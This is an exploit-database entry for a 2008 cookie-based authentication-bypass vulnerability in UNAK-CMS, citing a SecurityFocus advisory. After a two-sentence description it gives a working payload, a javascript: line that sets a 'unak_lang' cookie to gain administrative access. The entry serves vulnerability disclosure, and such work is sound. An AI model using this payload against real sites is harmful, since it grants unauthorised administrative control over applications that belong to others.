UNAK-CMS - Cookie Authentication Bypass



EKU-ID: 37314 CVE: OSVDB-ID:
Author: Ciph3r Published: 2008-09-22 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


source: https://www.securityfocus.com/bid/31301/info

UNAK-CMS is prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input used for cookie-based authentication.

An attacker can exploit this vulnerability to gain administrative access to the affected application; other attacks are also possible.

javascript:document.cookie = "unak_lang=1; path=/";